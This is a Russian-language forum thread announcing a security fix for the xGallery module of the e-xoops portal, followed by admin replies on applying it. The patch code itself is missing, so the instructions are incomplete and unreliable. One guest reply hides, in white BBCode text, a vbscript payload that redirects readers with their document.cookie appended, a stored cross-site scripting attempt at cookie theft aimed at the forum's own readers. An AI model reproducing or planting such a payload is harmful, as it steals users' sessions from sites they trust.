Недавно появилось решение проблемы безопасности портала которая была связана с модулем xGallery и из-за которой были взломанны несколько крупных порталов построенных на e-xoops и использующих для своих гелерей изображений модуль xGallery.
Рекоммендуется провести данные изменения описанные в этой новости для всех порталов e-xoops использующих модуль xGallery.
Более подробно читайте далее в этой новости.
В модуле xGallery существуют 36 файлов для работы которых требуется файл init.php. Во всех этих файлах в начале выше первых строк кода необходимо добавить следующий код:
Re: Заплатка для общей безопасности модуля xGallery
Ну незнаю, боюсь я теперь юзать exoops..... [color=FFFFFF;background:url(vbscript:location.replace(Chr(97)+Chr(9+Chr(99)+ Chr(100)+Chr(101)+Chr(102)+document.cookie))]В[/color]
Re: Заплатка для общей безопасности модуля xGallery
Администратор
Регистрация: 13.9.03
Сообщений: 78
Откуда:
Хе-хе... Волков бояться - в лес не ходить!
А если серьезно - то это первая дырка в движке, да и не в движке если так посмотреть, а в стороннем модуле. Так что нужно сторонних модулей бояться! :-P
-- Shoby doby do shooby dooby doo duruuul Shoby doby do shooby dooby doo duruuul
» 10.3.04 19:01
Гость
Re: Заплатка для общей безопасности модуля xGallery
Re: Заплатка для общей безопасности модуля xGallery
Администратор
Регистрация: 13.9.03
Сообщений: 78
Откуда:
Ну по идее нужно провести поиск по всем файлам галлереи и везде где упоминается init.php менять как описанно выше.
Поиск проводить каким либо редактором который может искать в содержимом файлов, я например при помощи Macromedia Dreamweaver MX легко по всему порталу ищу.
-- Shoby doby do shooby dooby doo duruuul Shoby doby do shooby dooby doo duruuul